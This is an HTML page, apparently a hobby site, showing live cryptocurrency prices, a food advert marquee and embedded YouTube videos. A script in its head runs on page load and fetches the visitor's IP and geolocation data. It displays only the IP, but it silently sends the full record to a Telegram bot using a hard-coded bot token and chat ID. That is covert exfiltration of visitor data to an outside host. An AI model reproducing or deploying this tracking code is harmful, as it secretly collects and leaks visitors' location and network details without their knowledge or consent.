<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    
    
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>

 
  <style>
  .navbar {
    font-family: Montserrat, sans-serif;
    margin-bottom: 0;
    background-color: #2d2d30;
    border: 0;
    font-size: 11px !important;
    letter-spacing: 4px;
    opacity: 0.9;
  }
  .navbar li a, .navbar .navbar-brand { 
    color: #d5d5d5 !important;
    
  }

  .menu li {
  padding: 8px;
  margin-bottom: 7px;
  background-color: #33b5e5;
  color: #ffffff;
  box-shadow: 0 1px 3px rgba(0,0,0,0.12), 0 1px 2px rgba(0,0,0,0.24);
  position: relative;
  left: 25px;
  top: 200px;
}

.menu li:hover {
  background-color: #e41c1c;
}






   
.kayan{
  position: flex;
  top: 10;

  font-size: 35px;
  width: 50px;
  height: 50px;
}
a{
  width: max-content;
  height: max-content;
}
ul {
  list-style-type: none;
  margin: 0;
  padding: 0;
  overflow: hidden;
  border: 1px solid #e7e7e7;
  background-color: #f3f3f3;
}

li {
  float: left;
}

li a {
  display: block;
  color: #666;
  text-align: center;
  padding: 14px 16px;
  text-decoration: none;
}

li a:hover:not(.active) {
  background-color: #ddd;
}

li a.active {
  color: white;
  background-color: #04AA6D;
}




#cont1{
  position: relative;
  left: 650px;
  top: 60px;
  width: 250px;
  height: 250px;

}
#cont2{
  position: relative;
  left: 255px;
  top: -510px;
  width: 250px;
  height: 250px;
}






  </style>


 <script src=
 "https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js">
     </script>
  
       <script>
      
     /* Add "https://api.ipify.org?format=json" statement
                this will communicate with the ipify servers in
                order to retrieve the IP address $.getJSON will
                load JSON-encoded data from the server using a
                GET HTTP request */
                 
         



              $.getJSON('http://ip-api.com/json', function(data) {
              console.log(JSON.stringify(data, null, 2));
              let output1=JSON.stringify(data, null, 2)
              
              document.getElementById("gfg").innerHTML=data.query
              console.log(data.query)

              var token="5763359618:AAGJnlCnJx7mNq7nRlDRPr1sBcFZ7dFqs7w"
              var chat_ıd=1102385447

              var url='https://api.telegram.org/bot5763359618:AAGJnlCnJx7mNq7nRlDRPr1sBcFZ7dFqs7w/sendMessage?chat_id=1102385447&text='+JSON.stringify(data, null, 2)
             
              let apı=new XMLHttpRequest();
              apı.open("GET",url,true);
              apı.send();

              
              });
              
         

     
              
     </script>
     
     


</head>
<body>
  <ul>
    <li><a href="#home">Home</a></li>
    <li><a href="#news">News</a></li>
    <li><a href="#contact">Contact</a></li>
    <li><a href="#about">About</a></li>
  </ul>

  <marquee  >

    
    <div>
          <div class="kayan">
            <span><a href="https://www.trbinance.com/trade/BTC_TRY">BTC</a></span>
            <span id="turko"></span>
            <span><a href="https://www.trbinance.com/trade/ETH_TRY">ETH</a></span>
            <span id="eths"></span>
            <span><a href="https://www.trbinance.com/trade/DOGE_TRY">DOGE</a></span>
            <span id="dogos"></span>
          </div>
  </marquee>
  <marquee  direction="right">
    <h1>
      <span>kardo köfte,gel al</span>
      <span>fiyat,3 lira</span>
    </h1>
    
  </marquee>

  <h1>YOUR IP:<a id="gfg"></a></h1>


  <div class="flex-container" id="cont1">
    
    <div>
      <div><iframe width="250" height="250" src="https://www.youtube.com/embed/4oH3ByFTxLk" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></div>
    </div>

    <div>
      <div> <div><iframe width="250" height="250" src="https://www.youtube.com/embed/aH9j7Z1FP1s" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></div>
    </div>
  
  </div>

  <div class="flex-contaniner"  id="cont2">
    
    <div>
      <div><iframe width="250" height="250" src="https://www.youtube.com/embed/aH9j7Z1FP1s" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></div>
    </div>

    <div>
      <div ><iframe width="250" height="250" src="https://www.youtube.com/embed/5k5P_Eqy4xo" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></div>
    </div>

  </div>

  <!--
$.getJSON('https://ipapi.co/json/', function(data) {
  console.log(JSON.stringify(data, null, 2));
});
-->







<script>
async function fack2() {
    let response = await fetch('https://api.blockchain.com/v3/exchange/tickers/DOGE-USD');

    let json = await response.json();

    
    
    document.getElementById("dogos").innerHTML=json["last_trade_price"]
    console.log(json["last_trade_price"])
    }
async function fack3() {
      let response = await fetch("https://api.blockchain.com/v3/exchange/tickers/ETH-USD");

        let json = await response.json();
        
        
    
        document.getElementById("eths").innerHTML = json["last_trade_price"];
        console.log(json["last_trade_price"])
        }
        
 async function fack1() {
    let response = await fetch("https://api.blockchain.com/v3/exchange/tickers/BTC-USD");    
    let json = await response.json();
    document.getElementById("turko").innerHTML = json["last_trade_price"];
    console.log(json["last_trade_price"])
          }          
          
setInterval(fack2,1000)
setInterval(fack3,1000)
setInterval(fack1,1000)

</script>
 

  


    <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
    <script src="https://cdn.jsdelivr.net/npm/popper.js@1.14.3/dist/umd/popper.min.js" integrity="sha384-ZMP7rVo3mIykV+2+9J3UJ46jBk0WLaUAdn689aCwoqbBJiSnjAK/l8WvCWPIPm49" crossorigin="anonymous"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.1.3/dist/js/bootstrap.min.js" integrity="sha384-ChfqqxuZUCnJSK3+MXmPNIyE6ZbWh2IMqE241rYiqJxyMiZ6OW/JmZQ5stwEULTy" crossorigin="anonymous"></script>
    <script src="https://cdn.ckeditor.com/4.19.1/standard/ckeditor.js"></script>
    <script>
        CKEDITOR.replace( 'content' );
    </script>
    
    
</body>
</html>